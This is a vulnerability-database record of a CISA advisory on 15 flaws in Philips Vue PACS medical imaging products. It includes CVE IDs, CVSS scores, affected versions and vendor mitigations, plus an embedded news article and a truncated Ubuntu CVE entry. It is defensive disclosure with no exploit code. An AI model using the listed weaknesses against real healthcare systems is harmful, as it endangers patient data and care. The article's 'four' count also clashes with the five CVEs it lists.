{"id": "ICSMA-21-187-01", "type": "ics", "bulletinFamily": "info", "title": "Philips Vue PACS", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low attack complexity\n * **Vendor: **Philips\n * **Equipment:** Vue PACS\n * **Vulnerabilities:** Cleartext Transmission of Sensitive Information, Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Input Validation, Improper Authentication, Improper Initialization, Use of a Broken or Risky Cryptographic Algorithm, Protection Mechanism Failure, Use of a Key Past its Expiration Date, Insecure Default Initialization of Resource, Improper Handling of Unicode Encoding, Insufficiently Protected Credentials, Data Integrity Issues, Cross-site Scripting, Improper Neutralization, Use of Obsolete Function\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nPhilips reports these vulnerabilities affect the following Vue PACS products:\n\n * Vue PACS: Versions 12.2.x.x and prior\n * Vue MyVue: Versions 12.2.x.x and prior\n * Vue Speech: Versions 12.2.x.x and prior\n * Vue Motion: Versions 12.2.1.5 and prior\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nThe product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.\n\n[CVE-2020-1938](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1938>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nThe software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This vulnerability exists within a third party software component (Redis).\n\n[CVE-2018-12326](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12326>) and [CVE-2018-11218](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11218>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [IMPROPER AUTHENTICATION CWE-287](<https://cwe.mitre.org/data/definitions/287.html>)\n\nWhen an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. This vulnerability exists within a third party software component (Redis).\n\n[CVE-2020-4670](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-4670>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [INSECURE DEFAULT INITIALIZATION OF RESOURCE CWE-1188](<https://cwe.mitre.org/data/definitions/1188.html>)\n\nThe software initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.\n\n[CVE-2018-8014](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8014>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [USE OF A KEY PAST ITS EXPIRATION DATE CWE-324](<https://cwe.mitre.org/data/definitions/324.html>)\n\nThe product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.\n\n[CVE-2021-33020](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33020>) has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N>)).\n\n#### 3.2.6 [IMPROPER INITIALIZATION CWE-665](<https://cwe.mitre.org/data/definitions/665.html>)\n\nThe software does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used. This vulnerability exists within a third party software component (7-Zip).\n\n[CVE-2018-10115](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10115>) has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is ([AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.7 [IMPROPER ADHERENCE TO CODING STANDARDS CWE-710](<https://cwe.mitre.org/data/definitions/710.html>)\n\nThe software does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.\n\n[CVE-2021-27501](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27501>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.8 [USE OF A BROKEN OR RISKY CRYPTOGRAPHIC ALGORITHM CWE-327](<https://cwe.mitre.org/data/definitions/327.html>)\n\nThe use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.\n\n[CVE-2021-33018](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33018>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N>)).\n\n#### 3.2.9 [PROTECTION MECHANISM FAILURE CWE-693](<https://cwe.mitre.org/data/definitions/693.html>)\n\nThe product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.\n\n[CVE-2021-27497](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27497>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N>)).\n\n#### 3.2.10 [DATA INTEGRITY ISSUES CWE-1214](<https://cwe.mitre.org/data/definitions/1214.html>)\n\nWeaknesses in this category is related to a software system's data integrity components. This vulnerability exists within a third party software component (Oracle Database).\n\n[CVE-2012-1708](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1708>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 3.2.11 [CROSS-SITE SCRIPTING CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in an output used as a webpage that is served to other users.\n\n[CVE-2015-9251](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9251>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 3.2.12 [IMPROPER NEUTRALIZATION CWE-707](<https://cwe.mitre.org/data/definitions/707.html>)\n\nThe product does not ensure or incorrectly ensures structured messages or data are well formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.\n\n[CVE-2021-27493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27493>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 3.2.13 [IMPROPER HANDLING OF UNICODE ENCODING CWE-176](<https://cwe.mitre.org/data/definitions/176.html>)\n\nThe software does not properly handle when an input contains Unicode encoding.\n\n[CVE-2019-9636](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9636>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 3.2.14 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)\n\nThe product transmits or stores authentication credentials, but it uses an insecure method susceptible to unauthorized interception and/or retrieval.\n\n[CVE-2021-33024](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33024>) has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 3.2.15 [CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319](<https://cwe.mitre.org/data/definitions/319.html>)\n\nThe software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.\n\n[CVE-2021-33022](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33022>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)). \n\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 3.4 RESEARCHER\n\nPhilips reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nPhilips has released the following plans to address these vulnerabilities:\n\n * Philips recommends configuring the Vue PACS environment per D00076344 \u2013 Vue_PACS_12_Ports_Protocols_Services_Guide available on Incenter.\n * Philips released Version 12.2.1.5 in June of 2020 for MyVue that remediates CWE-693 and recommends contacting support below.\n * Philips released Version 12.2.1.5 in June of 2020 for Vue Motion that remediates CWE-324 and recommends contacting support below.\n * Philips released Version 12.2.8.0 in May of 2021 for Speech that remediates CWE-693, CWE-319, CWE-119, CWE-287, and CWE-1214 and recommends contacting support below.\n * Philips released Version 12.2.8.0 in May of 2021 for PACS that remediates CWE-20, CWE-119, CWE-287 and recommends contacting support below.\n * Philips will release Version 15 in Q1 / 2022 for Speech that remediates CWE-665, CWE-327, CWE-710 and recommends contacting support below.\n * Philips will release Version 15 in Q1 / 2022 for MyVue that remediates CWE-665 and CWE-710 recommends contacting support below.\n * Philips will release Version 15 in Q1 / 2022 for PACS that remediates CWE-79, CWE-693, CWE-665, CWE-1188, CWE-327, CWE-176, CWE-522, CWE-710, and CWE-707 and recommends contacting support below.\n\nReleases are subject to country specific regulations. Users with questions regarding their specific Philips Vue PACS installations and new release eligibility should contact a Philips Sales representative or submit a quote request in the eService portal at: [Login - eService (philips.com)](<https://eservice.philips.com/Account/Login?returnUrl=%2F>)\n\nThe [Philips advisory](<http://www.philips.com/productsecurity>) is available. Please see the [Philips product security website](<https://www.philips.com/productsecurity>) for the latest security information for Philips products.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities. \n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01>); we'd welcome your feedback.\n", "published": "2021-07-06T00:00:00", "modified": "2021-07-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.us-cert.gov/ics/advisories/icsma-21-187-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsma-21-187-01", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsma-21-187-01", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsma-21-187-01", "https://cwe.mitre.org/data/definitions/20.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1938", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12326", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11218", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/287.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-4670", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/1188.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8014", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/324.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33020", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "https://cwe.mitre.org/data/definitions/665.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10115", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/710.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27501", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/327.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33018", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "https://cwe.mitre.org/data/definitions/693.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27497", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "https://cwe.mitre.org/data/definitions/1214.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1708", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "https://cwe.mitre.org/data/definitions/79.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9251", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "https://cwe.mitre.org/data/definitions/707.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27493", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "https://cwe.mitre.org/data/definitions/176.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9636", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "https://cwe.mitre.org/data/definitions/522.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33024", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "https://cwe.mitre.org/data/definitions/319.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33022", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "https://eservice.philips.com/Account/Login?returnUrl=%2F", "http://www.philips.com/productsecurity", "https://www.philips.com/productsecurity", "https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-10-301-01", "https://us-cert.cisa.gov/ics/recommended-practices", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2012-1708", "CVE-2015-9251", "CVE-2018-10115", "CVE-2018-11218", "CVE-2018-12326", "CVE-2018-8014", "CVE-2019-9636", "CVE-2020-1938", "CVE-2020-4670", "CVE-2021-27493", "CVE-2021-27497", "CVE-2021-27501", "CVE-2021-33018", "CVE-2021-33020", "CVE-2021-33022", "CVE-2021-33024"], "immutableFields": [], "lastseen": "2021-07-28T18:21:47", "viewCount": 67, "enchantments": {"dependencies": {"references": [{"type": "thn", "idList": ["THN:EF08CCF54E69481550D84949A563BAD5"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-12326", "UB:CVE-2015-9251", "UB:CVE-2018-11218", "UB:CVE-2018-8014", "UB:CVE-2020-1938", "UB:CVE-2019-9636", "UB:CVE-2018-10115"]}, {"type": "cve", "idList": ["CVE-2015-9251", "CVE-2018-11218", "CVE-2018-8014", "CVE-2018-12326", "CVE-2019-9636", "CVE-2012-1708", "CVE-2020-4670", "CVE-2018-10115", "CVE-2020-1938"]}, {"type": "attackerkb", "idList": ["AKB:8AA21692-1900-4944-98AB-BEC257302198", "AKB:4A2FD572-63FD-426B-8D34-A9914260EF72"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-8014", "RH:CVE-2018-10115", "RH:CVE-2020-1938"]}, {"type": "symantec", "idList": ["SMNTC-111273", "SMNTC-107400", "SMNTC-104553"]}, {"type": "f5", "idList": ["F5:K53254186", "F5:K11420556", "F5:K29562170"]}, {"type": "nessus", "idList": ["ORACLE_APEX_CVE-2012-1708.NASL", "JQUERY_3_0_0.NASL", "PHOTONOS_PHSA-2018-2_0-0065.NASL", "EULEROS_SA-2018-1227.NASL", "DEBIAN_DSA-4230.NASL", "AL2_ALAS-2020-1402.NASL", "7ZIP_18_05.NASL", "REDIS_4_0_10.NASL", "EULEROS_SA-2018-1220.NASL", "FREEBSD_PKG_416CA0F43FE011E9BBDD6805CA0B3D42.NASL"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/UBUNTU-CVE-2018-8014/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/", "MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:871AE561BA64280CEEDB0200B9838843"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70993", "ATLASSIAN:JRASERVER-70929"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891396", "OPENVAS:1361412562310107312", "OPENVAS:1361412562310704230", "OPENVAS:1361412562310851796", "OPENVAS:1361412562311220181220", "OPENVAS:1361412562310813439", "OPENVAS:1361412562310813438", "OPENVAS:1361412562310813378", "OPENVAS:1361412562311220181227", "OPENVAS:1361412562310141635"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1396-1:3B04A", "DEBIAN:DSA-4230-1:5B4A2"]}, {"type": "redhat", "idList": ["RHSA-2019:0052", "RHSA-2019:1467", "RHSA-2019:1860", "RHSA-2019:2980", "RHSA-2019:0094"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC451493BC4D8290B1A1CF86E18A6F98", "QUALYSBLOG:0E0377FD948B0481F7D7DC678F26D14F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148225"]}, {"type": "exploitdb", "idList": ["EDB-ID:44904"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9F45D8CAB6F6E66F98E43562AEAB5DE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-30598"]}, {"type": "amazon", "idList": ["ALAS2-2020-1402"]}, {"type": "freebsd", "idList": ["416CA0F4-3FE0-11E9-BBDD-6805CA0B3D42"]}, {"type": "github", "idList": ["GHSA-R4X2-3CQ5-HQVP", "GHSA-RMXG-73GG-4P98"]}, {"type": "ics", "idList": ["ICSA-18-212-04"]}, {"type": "kaspersky", "idList": ["KLA11256", "KLA11240"]}, {"type": "archlinux", "idList": ["ASA-201906-17", "ASA-201806-6", "ASA-201911-4"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1794-1", "OPENSUSE-SU-2019:1282-1", "OPENSUSE-SU-2018:1802-1"]}], "modified": "2021-07-28T18:21:47", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-07-28T18:21:47", "rev": 2}, "vulnersScore": 7.4}}

{"thn": [{"lastseen": "2021-07-09T08:33:52", "description": "[](<https://thehackernews.com/images/-722zAr6KSNw/YOfz3fwq9iI/AAAAAAAADJE/NRi_BoMoWmwTsr9GFGvw4QdJn5EMIb3FQCLcBGAsYHQ/s0/PACS-Medical-Imaging.jpg>)\n\nMultiple security vulnerabilities have been disclosed in Philips Clinical Collaboration Platform Portal (aka Vue PACS), some of which could be exploited by an adversary to take control of an affected system.\n\n\"Successful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [noted](<https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01>) in an advisory.\n\n[](<https://go.thn.li/1-free-300-7> \"Stack Overflow Teams\" )\n\nThe 15 flaws impact:\n\n * VUE Picture Archiving and Communication Systems (versions 12.2.x.x and prior),\n * Vue MyVue (versions 12.2.x.x and prior),\n * Vue Speech (versions 12.2.x.x and prior), and\n * Vue Motion (versions 12.2.1.5 and prior)\n\nFour of the issues (CVE-2020-1938, CVE-2018-12326, CVE-2018-11218, CVE-2020-4670, and CVE-2018-8014) have been given a Common Vulnerability Scoring System (CVSS) base score of 9.8, and concern improper validation of input data as well as vulnerabilities introduced by flaws previously patched in Redis.\n\nAnother serious flaw (CVE-2021-33020, CVSS score: 8.2) is caused by the Vue platform's use of cryptographic keys beyond their established expiration date, \"which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.\"\n\nOther weaknesses involve the use of a broken or risky cryptographic algorithm (CVE-2021-33018), a cross-site scripting attack when handling user-controllable input (CVE-2015-9251), insecure methods to protect authentication credentials (CVE-2021-33024), improper or incorrect initialization of resources (CVE-2018-8014), and a failure to follow coding standards (CVE-2021-27501) that could increase the severity of the other vulnerabilities.\n\n[](<https://go.thn.li/privileged_728> \"Prevent Data Breaches\" )\n\nWhile Philips has addressed some of the shortcomings as part of its updates shipped in June 2020 and May 2021, the Dutch healthcare company is expected to patch the rest of the security issues in version 15 of Speech, MyVue, and PACS that's currently in development and set for release in Q1 2022.\n\nIn the interim, CISA is urging entities to minimize network exposure for all control system devices and ensure that they are not accessible from the Internet, segment control system networks and remote devices behind firewalls, and use virtual private networks (VPNs) for secure remote access.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-07-09T07:00:00", "type": "thn", "title": "Critical Flaws Reported in Philips Vue PACS Medical Imaging Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2018-11218", "CVE-2018-12326", "CVE-2018-8014", "CVE-2020-1938", "CVE-2020-4670", "CVE-2021-27501", "CVE-2021-33018", "CVE-2021-33020", "CVE-2021-33024"], "modified": "2021-07-09T07:00:25", "id": "THN:EF08CCF54E69481550D84949A563BAD5", "href": "https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-07-30T22:49:04", "description": "Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3\nallows an attacker to achieve code execution and escalate to higher\nprivileges via a crafted command line. NOTE: It is unclear whether there\nare any common situations in which redis-cli is used with, for example, a\n-h (aka hostname) argument from an untrusted source.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 